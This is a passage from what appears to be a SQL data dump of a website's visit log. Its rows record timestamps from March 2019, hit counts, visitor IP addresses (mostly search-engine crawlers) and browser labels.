'128.68.35.251','msie'),(400735,1552830075,1,1,0,0,'188.32.102.105','msie'),(400736,1552830602,2,2,0,0,'216.244.66.241','other'),(400737,1552830650,1,1,0,0,'46.229.168.150','other'),(400738,1552830719,2,2,0,0,'66.249.66.138','chrome'),(400739,1552830997,1,1,0,0,'54.36.149.85','other'),(400740,1552831047,2,2,0,0,'207.46.13.5','other'),(400741,1552831055,1,1,0,0,'66.249.66.136','chrome'),(400742,1552831251,1,1,0,0,'54.36.150.48','other'),(400743,1552831698,1,1,0,0,'54.36.148.113','other'),(400744,1552832048,1,1,0,0,'54.36.150.148','other'),(400745,1552832053,1,1,0,0,'46.229.168.144','other'),(400746,1552832095,1,1,0,0,'54.36.149.43','other'),(400747,1552832127,1,1,0,0,'54.36.150.168','other'),(400748,1552832254,1,1,0,0,'54.36.150.83','other'),(400749,1552832340,1,1,0,0,'54.36.149.46','other'),(400750,1552832804,1,1,0,0,'157.55.39.189','other'),(400751,1552832913,1,1,0,0,'54.36.148.94','other'),(400752,1552832994,1,1,0,0,'5.45.207.19','other'),(400753,1552833238,1,1,0,0,'46.229.168.143','other'),(400754,1552833342,1,1,0,0,'54.36.150.0','other'),(400755,1552833391,1,1,0,0,'95.108.213.4','other'),(400756,1552833571,1,1,0,0,'37.9.113.20','other'),(400757,1552833691,2,2,0,0,'157.55.39.118','other'),(400758,1552833803,1,1,0,0,'8.29.198.26','other'),(400759,1552833842,1,1,0,0,'8.29.198.25','other'),(400760,1552833919,1,1,0,0,'91.196.178.133','firefox'),(400761,1552833930,1,1,0,0,'42.236.10.117','chrome'),(400762,1552833965,1,1,0,0,'42.236.10.124','other'),(400763,1552834216,1,1,0,0,'54.36.150.171','other'),(400764,1552834248,1,1,0,0,'37.9.113.103','other'),(400765,1552834318,1,1,0,0,'46.229.168.145','other'),(400766,1552834831,1,1,0,0,'40.77.167.9','other'),(400767,1552834874,1,1,0,0,'54.36.150.157','other'),(400768,1552835526,1,1,0,0,'66.249.66.60','chrome'),(400769,1552835878,1,1,0,0,'193.203.48.32','firefox'),(400770,1552836411,1,1,0,0,'54.36.148.206','other'),(400771,1552836482,1,1,0,0,'54.36.148.2','other'),(400772,1552836674,1,1,0,0,'46.229.168.151','other'),(400773,1552836677,1,1,0,0,'180.76.15.146','other'),(400774,1552836840,2,2,0,0,'66.249.66.136','chrome'),(400775,1552836874,1,1,0,0,'46.211.2.56','chrome'),(400776,1552836923,1,1,0,0,'54.36.149.106','other'),(400777,1552837013,1,1,0,0,'46.229.168.130','other'),(400778,1552837105,1,1,0,0,'54.36.148.1','other'),(400779,1552837965,1,1,0,0,'54.36.150.61','other'),(400780,1552837992,1,1,0,0,'66.249.66.134','chrome'),(400781,1552838205,1,1,0,0,'54.36.149.78','other'),(400782,1552838215,1,1,0,0,'66.249.66.136','chrome'),(400783,1552838966,1,1,0,0,'91.124.239.195','chrome'),(400784,1552839314,1,1,0,0,'66.249.66.60','chrome'),(400785,1552839446,1,1,0,0,'66.249.66.58','chrome'),(400786,1552840108,3,3,0,0,'66.249.64.58','chrome'),(400787,1552840169,1,1,0,0,'66.249.64.60','chrome'),(400788,1552840264,1,1,0,0,'54.36.150.59','other'),(400789,1552840287,1,1,0,0,'54.36.148.161','other'),(400790,1552840310,1,1,0,0,'76.16.242.208','chrome'),(400791,1552841425,1,1,0,0,'40.77.167.67','other'),(400792,1552841456,1,1,0,0,'54.36.148.80','other'),(400793,1552841606,1,1,0,0,'54.36.148.146','other'),(400794,1552841855,1,1,0,0,'54.36.149.38','other'),(400795,1552842290,1,1,0,0,'54.36.150.153','other'),(400796,1552842350,1,1,0,0,'54.36.148.212','other'),(400797,1552842373,1,1,0,0,'5.45.207.19','other'),(400798,1552842382,1,1,0,0,'54.36.148.57','other'),(400799,1552842430,1,1,0,0,'141.8.142.103','other'),(400800,1552842791,1,1,0,0,'46.211.134.210','chrome'),(400801,1552843099,1,1,0,0,'46.229.168.136','other'),(400802,1552843181,1,1,0,0,'207.46.13.84','other'),(400803,1552843710,1,1,0,0,'46.229.168.151','other'),(400804,1552843968,1,1,0,0,'54.36.150.46','other'),(400805,1552843983,1,1,0,0,'54.36.148.89','other'),(400806,1552844413,1,1,0,0,'23.228.81.10','chrome'),(400807,1552844438,1,1,0,0,'54.88.59.161','firefox'),(400808,1552844555,1,1,0,0,'216.244.66.241','other'),(400809,1552844644,2,2,0,0,'8.29.198.25','other'),(400810,1552845118,1,1,0,0,'54.36.148.115','other'),(400811,1552845204,1,1,0,0,'54.36.150.120','other'),(400812,1552845236,1,1,0,0,'157.55.39.212','other'),(400813,1552845269,10,10,0,0,'144.76.3.79','other'),(400814,1552845443,1,1,0,0,'54.36.148.85','other'),(400815,1552845610,1,1,0,0,'54.36.150.106','other'),(400816,1552845676,1,1,0,0,'54.36.148.1','other'),(400817,1552846045,1,1,0,0,'157.55.39.216','other'),(400818,1552846406,1,1,0,0,'5.45.207.19','other'),(400819,1552846771,1,1,0,0,'207.46.13.84','other'),(400820,1552846784,1,1,0,0,'54.36.150.138','other'),(400821,1552846920,2,2,0,0,'40.77.167.67','other'),(400822,1552847086,1,1,0,0,'54.36.148.222','other'),(400823,1552847371,1,1,0,0,'54.36.150.162','other'),(400824,1552847556,1,1,0,0,'54.36.148.139','other'),(400825,1552847567,1,1,0,0,'54.36.150.154','other'),(400826,1552847941,1,1,0,0,'157.55.39.216','other'),(400827,1552848065,1,1,0,0,'54.36.149.62','other'),(400828,1552848351,1,1,0,0,'54.36.148.3','other'),(400829,1552848626,1,1,0,0,'46.229.168.138','other'),(400830,1552848646,1,1,0,0,'54.36.148.182','other'),(400831,1552849112,1,1,0,0,'54.36.150.94','other'),(400832,1552849162,1,1,0,0,'54.36.148.112','other'),(400833,1552849846,1,1,0,0,'54.36.150.86','other'),(400834,1552849891,1,1,0,0,'54.36.150.88','other'),(400835,1552849930,1,1,0,0,'54.36.150.59','other'),(400836,1552850233,1,1,0,0,'54.36.148.109','other'),(400837,1552850313,1,1,0,0,'54.36.150.47','other'),(400838,1552850368,1,1,0,0,'54.36.148.129','other'),(400839,1552850422,1,1,0,0,'46.229.168.142','other'),(400840,1552851848,2,2,0,0,'87.250.224.47','other'),(400841,1552851873,2,2,0,0,'95.108.213.4','other'),(400842,1552852233,1,1,0,0,'157.55.39.107','other'),(400843,1552852518,1,1,0,0,'141.8.142.103','other'),(400844,1552852628,1,1,0,0,'37.9.113.103','other'),(400845,1552852694,1,1,0,0,'40.77.167.67','other'),(400846,1552852836,1,1,0,0,'5.196.87.175','other'),(400847,1552853066,1,1,0,0,'37.9.113.148','other'),(400848,1552853242,1,1,0,0,'5.45.207.19','other'),(400849,1552853564,1,1,0,0,'54.36.148.198','other'),(400850,1552853600,1,1,0,0,'54.36.148.19','other'),(400851,1552853851,2,2,0,0,'46.229.168.133','other'),(400852,1552854028,1,1,0,0,'46.211.53.16','chrome'),(400853,1552854133,1,1,0,0,'46.229.168.147','other'),(400854,1552854182,1,1,0,0,'54.36.148.193','other'),(400855,1552854202,1,1,0,0,'54.36.148.62','other'),(400856,1552854342,1,1,0,0,'46.229.168.137','other'),(400857,1552854452,1,1,0,0,'54.36.150.45','other'),(400858,1552854512,1,1,0,0,'46.229.168.148','other'),(400859,1552854649,1,1,0,0,'54.36.148.39','other'),(400860,1552855002,1,1,0,0,'216.244.66.241','other'),(400861,1552855238,1,1,0,0,'46.229.168.152','other'),(400862,1552855471,2,2,0,0,'8.29.198.27','other'),(400863,1552855739,1,1,0,0,'54.36.148.160','other'),(400864,1552856127,1,1,0,0,'54.36.150.179','other'),(400865,1552856420,1,1,0,0,'54.36.149.11','other'),(400866,1552856459,1,1,0,0,'46.229.168.134','other'),(400867,1552857704,1,1,0,0,'216.244.66.241','other'),(400868,1552857829,2,2,0,0,'157.55.39.208','other'),(400869,1552857994,1,1,0,0,'54.36.149.52','other'),(400870,1552858264,1,1,0,0,'46.229.168.130','other'),(400871,1552858474,1,1,0,0,'54.36.150.166','other'),(400872,1552858908,1,1,0,0,'178.158.208.138','chrome'),(400873,1552858915,1,1,0,0,'180.163.220.3','chrome'),(400874,1552859483,1,1,0,0,'54.36.148.68','other'),(400875,1552859614,1,1,0,0,'54.36.150.101','other'),(400876,1552859630,1,1,0,0,'54.36.148.129','other'),(400877,1552860150,2,2,0,0,'60.191.38.77','firefox'),(400878,1552860195,1,1,0,0,'54.36.150.43','other'),(400879,1552860306,1,1,0,0,'54.36.148.126','other'),(400880,1552860314,1,1,0,0,'54.36.148.43','other'),(400881,1552860370,1,1,0,0,'178.158.208.138','chrome'),(400882,1552860424,1,0,1,0,'66.249.64.31',''),(400883,1552860602,1,1,0,0,'54.36.149.95','other'),(400884,1552860724,1,1,0,0,'46.229.168.149','other'),(400885,1552861704,1,1,0,0,'40.77.167.97','other'),(400886,1552861766,1,1,0,0,'54.36.148.134','other'),(400887,1552862485,1,1,0,0,'54.36.148.227','other'),(400888,1552862608,1,1,0,0,'54.36.149.96','other'),(400889,1552862663,2,2,0,0,'178.154.244.11','other'),(400890,1552862673,1,1,0,0,'5.45.207.79','other'),(400891,1552862719,1,1,0,0,'95.108.213.4','other'),(400892,1552862883,1,1,0,0,'5.45.207.19','other'),(400893,1552863100,1,1,0,0,'54.36.148.218','other'),(400894,1552863765,1,1,0,0,'54.36.150.85','other'),(400895,1552863922,1,1,0,0,'54.36.149.105','other'),(400896,1552864594,1,1,0,0,'46.229.168.135','other'),(400897,1552864895,1,1,0,0,'66.249.64.60','chrome'),(400898,1552865086,1,1,0,0,'54.36.150.27','other'),(400899,1552865283,1,1,0,0,'5.45.207.79','other'),(400900,1552865722,1,1,0,0,'54.36.148.137','other'),(400901,1552866315,1,1,0,0,'8.29.198.25','other'),(400902,1552866352,1,1,0,0,'8.29.198.26','other'),(400903,1552866760,1,1,0,0,'54.36.148.177','other'),(400904,1552867545,1,1,0,0,'46.229.168.135','other'),(400905,1552867563,1,1,0,0,'46.229.168.134','other'),(400906,1552867565,1,1,0,0,'95.163.255.107','other'),(400907,1552867865,1,1,0,0,'54.36.148.221','other'),(400908,1552867929,1,1,0,0,'54.36.148.208','other'),(400909,1552868096,1,1,0,0,'54.36.149.57','other'),(400910,1552868236,1,1,0,0,'54.36.149.106','other'),(400911,1552868417,1,1,0,0,'199.16.157.180','other'),(400912,1552868455,1,1,0,0,'87.250.224.47','other'),(400913,1552868613,1,1,0,0,'66.249.64.31','chrome'),(400914,1552869018,1,1,0,0,'5.45.207.79','other'),(400915,1552869379,1,1,0,0,'66.249.64.60','chrome'),(400916,1552869443,1,1,0,0,'54.36.148.62','other'),(400917,1552869457,1,1,0,0,'5.196.87.174','other'),(400918,1552870031,1,1,0,0,'66.249.64.30','chrome'),(400919,1552870315,1,1,0,0,'54.36.150.92','other'),(400920,1552870517,1,1,0,0,'54.36.150.176','other'),(400921,1552870535,1,1,0,0,'82.202.249.86','chrome'),(400922,1552870606,1,1,0,0,'54.36.150.81','other'),(400923,1552870663,1,1,0,0,'216.244.66.241','other'),(400924,1552870831,1,1,0,0,'54.36.150.148','other'),(400925,1552870887,1,1,0,0,'180.76.15.7','other'),(400926,1552870923,1,1,0,0,'54.188.167.56','other'),(400927,1552871211,1,1,0,0,'40.77.167.6','other'),(400928,1552871454,1,1,0,0,'54.36.148.255','other'),(400929,1552871634,1,1,0,0,'46.229.168.143','other'),(400930,1552871678,2,2,0,0,'5.45.207.79','other'),(400931,1552872203,1,1,0,0,'54.36.148.235','other'),(400932,1552872342,1,1,0,0,'144.76.38.40','other'),(400933,1552872373,1,1,0,0,'5.45.207.19','other'),(400934,1552872377,1,1,0,0,'178.154.244.11','other'),(400935,1552872647,1,1,0,0,'66.249.64.30','chrome'),(400936,1552872868,1,1,0,0,'54.36.150.108','other'),(400937,1552873043,1,1,0,0,'46.229.168.136','other'),(400938,1552874047,1,1,0,0,'54.36.148.12','other'),(400939,1552875785,1,1,0,0,'109.201.154.251','other'),(400940,1552875818,1,1,0,0,'216.244.66.241','other'),(400941,1552876009,1,1,0,0,'54.36.148.22','other'),(400942,1552876150,2,2,0,0,'54.212.104.135','chrome'),(400943,1552876200,1,1,0,0,'54.36.148.152','other'),(400944,1552876230,1,1,0,0,'46.229.168.151','other'),(400945,1552876436,1,1,0,0,'54.36.148.2','other'),(400946,1552876660,1,1,0,0,'207.46.13.62','other'),(400947,1552876662,1,1,0,0,'54.36.148.228','other'),(400948,1552876711,1,1,0,0,'54.36.148.252','other'),(400949,1552877165,1,1,0,0,'8.29.198.26','other'),(400950,1552877187,1,1,0,0,'8.29.198.27','other'),(400951,1552877192,1,1,0,0,'157.55.39.158','other'),(400952,1552877434,1,1,0,0,'54.36.150.124','other'),(400953,1552877647,1,1,0,0,'54.36.148.30','other'),(400954,1552877897,1,1,0,0,'66.249.64.30','chrome'),(400955,1552878113,1,1,0,0,'66.249.64.31','chrome'),(400956,1552878205,1,1,0,0,'54.36.149.54','other'),(400957,1552878413,1,1,0,0,'54.36.149.70','other'),(400958,1552878440,1,1,0,0,'54.36.150.7','other'),(400959,1552878556,1,1,0,0,'157.55.39.235','other'),(400960,1552878631,1,1,0,0,'66.249.64.62','chrome'),(400961,1552879186,1,1,0,0,'54.36.150.126','other'),(400962,1552879659,1,1,0,0,'54.36.150.64','other'),(400963,1552880017,1,1,0,0,'54.36.150.63','other'),(400964,1552880043,1,1,0,0,'54.36.149.71','other'),(400965,1552881019,3,3,0,0,'178.154.244.11','other'),(400966,1552881141,1,1,0,0,'5.45.207.79','other'),(400967,1552881633,1,1,0,0,'87.250.224.81','other'),(400968,1552881758,1,1,0,0,'5.45.207.19','other'),(400969,1552881790,2,2,0,0,'95.108.213.4','other'),(400970,1552881842,1,1,0,0,'37.9.113.148','other'),(400971,1552881847,1,1,0,0,'54.36.149.5','other'),(400972,1552881934,1,1,0,0,'54.36.148.164','other'),(400973,1552882038,1,1,0,0,'87.250.224.47','other'),(400974,1552882053,1,1,0,0,'5.45.207.79','other'),(400975,1552882137,2,2,0,0,'178.154.244.11','other'),(400976,1552882182,1,1,0,0,'207.46.13.203','other'),(400977,1552882413,1,1,0,0,'54.36.148.64','other'),(400978,1552882618,1,1,0,0,'54.36.148.200','other'),(400979,1552883308,1,1,0,0,'46.229.168.134','other'),(400980,1552883362,1,1,0,0,'54.36.148.62','other'),(400981,1552883751,2,2,0,0,'66.249.64.29','chrome'),(400982,1552883995,1,1,0,0,'54.36.149.51','other'),(400983,1552884181,1,1,0,0,'54.36.148.211','other'),(400984,1552884277,1,1,0,0,'40.77.167.185','other'),(400985,1552884388,1,1,0,0,'66.249.64.60','chrome'),(400986,1552884468,1,1,0,0,'207.46.13.146','other'),(400987,1552884568,1,1,0,0,'54.36.150.47','other'),(400988,1552885152,1,1,0,0,'54.36.148.48','other'),(400989,1552885354,1,1,0,0,'46.229.168.138','other'),(400990,1552885456,1,1,0,0,'54.36.149.59','other'),(400991,1552885561,1,1,0,0,'46.229.168.146','other'),(400992,1552885624,1,1,0,0,'54.36.150.63','other'),(400993,1552885772,1,1,0,0,'66.249.64.62','chrome'),(400994,1552885781,1,1,0,0,'46.229.168.148','other'),(400995,1552885996,1,1,0,0,'54.36.148.194','other'),(400996,1552886134,1,1,0,0,'54.36.150.38','other'),(400997,1552886390,1,1,0,0,'40.77.167.185','other'),(400998,1552886426,1,1,0,0,'54.36.148.22','other'),(400999,1552886438,1,1,0,0,'54.36.148.125','other'),(401000,1552886530,1,1,0,0,'54.36.148.92','other'),(401001,1552886601,1,1,0,0,'54.36.148.97','other'),(401002,1552886897,1,1,0,0,'46.229.168.152','other'),(401003,1552887322,1,1,0,0,'54.36.148.12','other'),(401004,1552887787,1,1,0,0,'5.188.210.51','chrome'),(401005,1552888007,2,2,0,0,'8.29.198.27','other'),(401006,1552888936,1,1,0,0,'216.244.66.241','other'),(401007,1552889442,1,1,0,0,'46.229.168.141','other'),(401008,1552890028,1,1,0,0,'54.36.150.95','other'),(401009,1552890082,1,1,0,0,'54.36.148.159','other'),(401010,1552890358,1,1,0,0,'54.36.148.203','other'),(401011,1552890405,1,1,0,0,'51.15.252.1','other'),(401012,1552890447,1,1,0,0,'91.196.178.93','chrome'),(401013,1552890473,1,1,0,0,'5.45.207.19','other'),(401014,1552890477,1,1,0,0,'87.250.224.47','other'),(401015,1552890548,2,2,0,0,'178.154.244.11','other'),(401016,1552890703,1,1,0,0,'54.36.150.185','other'),(401017,1552891000,1,1,0,0,'91.196.177.46','chrome'),(401018,1552891147,1,1,0,0,'54.36.148.193','other'),(401019,1552891151,3,3,0,0,'5.45.207.79','other'),(401020,1552891503,2,2,0,0,'178.154.244.11','other'),(401021,1552891515,1,1,0,0,'216.244.66.241','other'),(401022,1552891557,2,2,0,0,'40.77.167.185','other'),(401023,1552891606,1,1,0,0,'207.46.13.203','other'),(401024,1552891793,1,1,0,0,'91.196.177.46','firefox'),(401025,1552891937,1,1,0,0,'54.36.148.201','other'),(401026,1552892122,1,1,0,0,'66.249.64.29','chrome'),(401027,1552892195,1,1,0,0,'185.138.203.244','chrome'),(401028,1552892682,1,1,0,0,'178.154.244.11','other'),(401029,1552892885,1,1,0,0,'54.36.150.129','other'),(401030,1552893054,1,1,0,0,'54.36.150.79','other'),(401031,1552893207,1,1,0,0,'46.229.168.147','other'),(401032,1552893386,1,1,0,0,'54.36.148.125','other'),(401033,1552893433,1,1,0,0,'94.137.13.131','msie'),(401034,1552893442,1,1,0,0,'46.188.49.208','msie'),(401035,1552894067,1,1,0,0,'54.36.148.120','other'),(401036,1552894081,1,1,0,0,'46.229.168.149','other'),(401037,1552894089,1,1,0,0,'66.249.64.31','chrome'),(401038,1552894175,1,1,0,0,'94.178.128.74','chrome'),(401039,1552894265,2,2,0,0,'40.77.167.185','other'),(401040,1552894268,1,1,0,0,'54.36.149.10','other'),(401041,1552894467,1,1,0,0,'66.249.64.58','chrome'),(401042,1552894629,1,1,0,0,'64.246.165.150','firefox'),(401043,1552894780,1,1,0,0,'54.36.150.160','other'),(401044,1552894949,1,1,0,0,'46.229.168.129','other'),(401045,1552895061,1,1,0,0,'54.36.149.61','other'),(401046,1552895148,1,1,0,0,'54.36.149.33','other'),(401047,1552895247,1,1,0,0,'54.36.150.30','other'),(401048,1552895737,1,1,0,0,'91.196.178.86','firefox'),(401049,1552895784,1,1,0,0,'54.36.148.184','other'),(401050,1552895895,1,1,0,0,'54.36.148.226','other'),(401051,1552895962,1,1,0,0,'91.124.221.62','chrome'),(401052,1552896052,1,1,0,0,'5.45.207.19','other'),(401053,1552896058,1,1,0,0,'37.9.113.148','other'),(401054,1552896215,1,1,0,0,'176.120.52.64','chrome'),(401055,1552896239,1,1,0,0,'180.76.15.12','other'),(401056,1552896473,1,1,0,0,'109.201.154.211','other'),(401057,1552896693,2,2,0,0,'5.45.207.79','other'),(401058,1552896750,1,1,0,0,'54.36.148.186','other'),(401059,1552896841,1,1,0,0,'54.36.149.27','other'),(401060,1552897264,2,2,0,0,'5.45.207.19','other'),(401061,1552897317,1,1,0,0,'3.91.2.189','other'),(401062,1552897405,1,1,0,0,'66.249.64.29','chrome'),(401063,1552897460,1,1,0,0,'157.55.39.223','other'),(401064,1552897578,1,1,0,0,'66.249.64.31','chrome'),(401065,1552897703,1,1,0,0,'46.229.168.138','other'),(401066,1552897751,1,1,0,0,'54.36.148.85','other'),(401067,1552898462,1,1,0,0,'94.179.36.107','chrome'),(401068,1552898514,1,1,0,0,'207.46.13.203','other'),(401069,1552898785,1,1,0,0,'95.135.240.118','firefox'),(401070,1552898843,1,1,0,0,'8.29.198.25','other'),(401071,1552898852,1,1,0,0,'8.29.198.26','other'),(401072,1552898959,1,1,0,0,'42.236.10.75','chrome'),(401073,1552899074,1,1,0,0,'46.229.168.129','other'),(401074,1552899254,2,2,0,0,'141.8.142.103','other'),(401075,1552899297,2,2,0,0,'5.45.207.19','other'),(401076,1552899360,1,1,0,0,'66.249.64.58','chrome'),(401077,1552899576,1,1,0,0,'54.36.150.64','other'),(401078,1552899620,1,1,0,0,'54.36.149.64','other'),(401079,1552899669,1,1,0,0,'162.209.98.148','other'),(401080,1552899677,1,1,0,0,'54.36.149.7','other'),(401081,1552899740,1,1,0,0,'66.249.64.30','chrome'),(401082,1552899838,1,1,0,0,'91.196.178.131','chrome'),(401083,1552899866,1,1,0,0,'178.154.244.11','other'),(401084,1552900127,1,1,0,0,'54.36.148.54','other'),(401085,1552900177,1,1,0,0,'87.250.224.65','other'),(401086,1552900465,1,1,0,0,'54.36.148.202','other'),(401087,1552900508,1,1,0,0,'5.45.207.19','other'),(401088,1552900545,1,1,0,0,'54.36.150.69','other'),(401089,1552900622,1,1,0,0,'46.211.64.235','chrome'),(401090,1552900761,1,1,0,0,'5.45.207.79','other'),(401091,1552900764,1,1,0,0,'66.249.64.31','chrome'),(401092,1552900776,1,1,0,0,'207.46.13.146','other'),(401093,1552900997,1,1,0,0,'54.36.148.180','other'),(401094,1552901121,1,1,0,0,'66.249.64.60','chrome'),(401095,1552901369,1,1,0,0,'54.36.149.101','other'),(401096,1552901389,1,1,0,0,'54.36.148.160','other'),(401097,1552902159,1,1,0,0,'54.36.150.14','other'),(401098,1552902367,1,1,0,0,'54.36.149.29','other'),(401099,1552902545,1,1,0,0,'46.229.168.133','other'),(401100,1552902702,1,1,0,0,'46.229.168.146','other'),(401101,1552903299,1,1,0,0,'54.36.149.57','other'),(401102,1552903789,1,1,0,0,'46.211.120.136','chrome'),(401103,1552903852,1,1,0,0,'46.229.168.139','other'),(401104,1552904101,1,1,0,0,'54.36.150.115','other'),(401105,1552904324,1,1,0,0,'54.36.148.198','other'),(401106,1552904504,2,2,0,0,'157.55.39.223','other'),(401107,1552904574,2,2,0,0,'37.53.168.241','chrome'),(401108,1552904712,2,2,0,0,'46.229.168.129','other'),(401109,1552904943,1,1,0,0,'54.36.150.134','other'),(401110,1552905015,1,1,0,0,'82.207.49.94','chrome'),(401111,1552905102,1,1,0,0,'95.134.202.37','chrome'),(401112,1552905103,1,1,0,0,'5.196.87.174','other'),(401113,1552905341,1,1,0,0,'92.112.240.51','chrome'),(401114,1552905344,1,1,0,0,'216.244.66.241','other'),(401115,1552905433,1,1,0,0,'40.77.167.142','other'),(401116,1552905451,1,1,0,0,'54.36.150.5','other'),(401117,1552905565,1,1,0,0,'46.229.168.147','other'),(401118,1552905645,1,1,0,0,'54.36.150.91','other'),(401119,1552905846,1,1,0,0,'42.236.10.78','chrome'),(401120,1552906337,1,1,0,0,'46.96.8.170','other'),(401121,1552906679,1,1,0,0,'207.46.13.203','other'),(401122,1552907762,1,1,0,0,'54.36.148.41','other'),(401123,1552907798,1,1,0,0,'216.244.66.241','other'),(401124,1552907892,1,1,0,0,'40.77.167.34','other'),(401125,1552908207,1,1,0,0,'54.36.148.215','other'),(401126,1552908365,1,1,0,0,'82.207.49.94','chrome'),(401127,1552908717,1,1,0,0,'54.36.150.116','other'),(401128,1552908897,1,1,0,0,'54.36.148.235','other'),(401129,1552909051,1,1,0,0,'5.45.207.19','other'),(401130,1552909125,1,1,0,0,'66.249.64.29','chrome'),(401131,1552909144,1,1,0,0,'46.42.146.24','firefox'),(401132,1552909154,1,1,0,0,'5.45.207.79','other'),(401133,1552909506,1,1,0,0,'40.77.167.34','other'),(401134,1552909588,1,1,0,0,'46.229.168.137','other'),(401135,1552909674,2,2,0,0,'8.29.198.25','other'),(401136,1552909809,1,1,0,0,'54.36.148.20','other'),(401137,1552909939,1,1,0,0,'54.36.148.139','other'),(401138,1552910577,1,1,0,0,'216.244.66.241','other'),(401139,1552910589,1,1,0,0,'54.36.149.61','other'),(401140,1552910645,2,2,0,0,'82.207.103.107','chrome'),(401141,1552910744,4,4,0,0,'40.77.167.34','other'),(401142,1552910750,2,2,0,0,'40.77.167.181','other'),(401143,1552910768,4,4,0,0,'207.46.13.11','other'),(401144,1552910908,1,1,0,0,'46.229.168.152','other'),(401145,1552912005,1,1,0,0,'40.77.167.181','other'),(401146,1552912049,1,1,0,0,'54.36.149.46','other'),(401147,1552912084,2,2,0,0,'207.46.13.11','other'),(401148,1552912528,1,1,0,0,'46.229.168.151','other'),(401149,1552913003,1,1,0,0,'54.36.149.104','other'),(401150,1552913153,1,1,0,0,'54.36.148.1','other'),(401151,1552913193,2,2,0,0,'198.16.78.43','chrome'),(401152,1552913209,1,1,0,0,'37.52.99.228','chrome'),(401153,1552913330,1,1,0,0,'46.229.168.146','other'),(401154,1552913387,1,1,0,0,'46.211.130.216','chrome'),(401155,1552913440,2,2,0,0,'37.52.99.228','firefox'),(401156,1552913501,1,1,0,0,'207.46.13.114','other'),(401157,1552913570,1,1,0,0,'54.36.149.31','other'),(401158,1552913624,1,1,0,0,'54.36.149.98','other'),(401159,1552913692,1,1,0,0,'46.229.168.147','other'),(401160,1552913801,1,1,0,0,'46.96.20.9','other'),(401161,1552913943,1,1,0,0,'54.36.149.10','other'),(401162,1552914047,1,1,0,0,'54.36.148.79','other'),(401163,1552914156,1,1,0,0,'198.16.78.43','chrome'),(401164,1552914293,1,1,0,0,'54.36.148.92','other'),(401165,1552914707,1,1,0,0,'37.52.99.228','firefox'),(401166,1552914766,1,1,0,0,'46.201.253.158','chrome'),(401167,1552915264,1,1,0,0,'54.36.149.105','other'),(401168,1552915276,1,1,0,0,'91.196.178.172','chrome'),(401169,1552915379,1,1,0,0,'185.185.254.27','chrome'),(401170,1552915485,1,1,0,0,'46.211.132.232','chrome'),(401171,1552915511,1,1,0,0,'178.137.17.200','chrome'),(401172,1552915609,1,1,0,0,'5.45.207.19','other'),(401173,1552915644,1,1,0,0,'188.163.16.223','chrome'),(401174,1552916433,1,1,0,0,'54.36.150.88','other'),(401175,1552916476,1,1,0,0,'54.36.148.174','other'),(401176,1552916529,1,1,0,0,'54.36.150.11','other'),(401177,1552916609,1,1,0,0,'37.55.27.200','chrome'),(401178,1552916792,1,1,0,0,'178.136.6.103','other'),(401179,1552916820,1,1,0,0,'54.36.149.7','other'),(401180,1552916826,1,1,0,0,'54.36.150.179','other'),(401181,1552916997,1,1,0,0,'5.45.207.79','other'),(401182,1552917446,1,1,0,0,'54.36.150.138','other'),(401183,1552917541,1,1,0,0,'54.36.150.144','other'),(401184,1552917645,1,1,0,0,'54.36.150.191','other'),(401185,1552917900,1,1,0,0,'193.19.152.90','chrome'),(401186,1552917957,1,1,0,0,'37.55.27.200','chrome'),(401187,1552918101,1,1,0,0,'54.36.148.20','other'),(401188,1552918102,1,1,0,0,'54.36.148.228','other'),(401189,1552918605,2,2,0,0,'5.45.207.79','other'),(401190,1552918695,1,1,0,0,'193.110.19.163','firefox'),(401191,1552918713,1,1,0,0,'54.36.150.134','other'),(401192,1552918843,2,2,0,0,'54.36.148.49','other'),(401193,1552918866,1,1,0,0,'5.45.207.19','other'),(401194,1552919000,1,1,0,0,'87.250.224.81','other'),(401195,1552919037,1,1,0,0,'66.249.64.30','chrome'),(401196,1552919092,1,1,0,0,'207.46.13.11','other'),(401197,1552919278,2,2,0,0,'178.154.244.11','other'),(401198,1552919694,1,1,0,0,'54.36.148.15','other'),(401199,1552919726,1,1,0,0,'54.36.149.72','other'),(401200,1552919768,1,1,0,0,'207.46.13.114','other'),(401201,1552920211,1,1,0,0,'195.230.154.180','chrome'),(401202,1552920401,1,1,0,0,'54.36.150.50','other'),(401203,1552920485,1,1,0,0,'91.196.178.65','chrome'),(401204,1552920526,2,2,0,0,'8.29.198.27','other'),(401205,1552920534,1,1,0,0,'54.36.150.97','other'),(401206,1552920542,2,2,0,0,'40.77.167.34','other'),(401207,1552920548,1,1,0,0,'46.211.132.232','chrome'),(401208,1552920957,1,1,0,0,'91.196.178.172','chrome'),(401209,1552921016,1,1,0,0,'54.36.150.94','other'),(401210,1552921178,1,1,0,0,'207.46.13.113','other'),(401211,1552921272,2,2,0,0,'207.46.13.11','other'),(401212,1552921321,1,1,0,0,'54.36.150.20','other'),(401213,1552921549,1,1,0,0,'46.229.168.141','other'),(401214,1552921925,1,1,0,0,'54.36.149.38','other'),(401215,1552922114,1,1,0,0,'54.36.148.49','other'),(401216,1552922161,1,1,0,0,'66.249.64.30','chrome'),(401217,1552922418,1,1,0,0,'66.249.64.62','chrome'),(401218,1552922424,1,1,0,0,'66.249.64.60','chrome'),(401219,1552922454,1,1,0,0,'54.36.150.117','other'),(401220,1552922481,1,1,0,0,'54.36.148.178','other'),(401221,1552922508,1,1,0,0,'46.229.168.133','other'),(401222,1552922566,1,1,0,0,'46.229.168.136','other'),(401223,1552922572,1,1,0,0,'66.249.64.31','chrome'),(401224,1552922767,2,2,0,0,'95.213.141.126','opera'),(401225,1552922771,1,1,0,0,'54.36.149.21','other'),(401226,1552923451,1,1,0,0,'207.46.13.11','other'),(401227,1552923537,1,1,0,0,'213.108.41.211','chrome'),(401228,1552923706,1,1,0,0,'40.77.167.130','other'),(401229,1552923988,2,2,0,0,'66.249.64.30','chrome'),(401230,1552923992,1,1,0,0,'5.45.207.79','other'),(401231,1552924148,1,1,0,0,'40.77.167.34','other'),(401232,1552924176,1,1,0,0,'66.249.64.60','chrome'),(401233,1552924209,1,1,0,0,'207.46.13.191','other'),(401234,1552924211,3,3,0,0,'66.249.64.62','chrome'),(401235,1552924556,1,1,0,0,'54.36.150.86','other'),(401236,1552925010,1,1,0,0,'66.249.64.29','chrome'),(401237,1552925165,1,1,0,0,'66.249.64.60','chrome'),(401238,1552925439,1,1,0,0,'54.36.148.197','other'),(401239,1552925558,1,1,0,0,'54.36.148.69','other'),(401240,1552925841,2,2,0,0,'216.244.66.241','other'),(401241,1552926091,1,1,0,0,'213.108.41.211','chrome'),(401242,1552926144,1,1,0,0,'66.249.64.30','chrome'),(401243,1552926188,1,1,0,0,'40.77.167.130','other'),(401244,1552926227,1,1,0,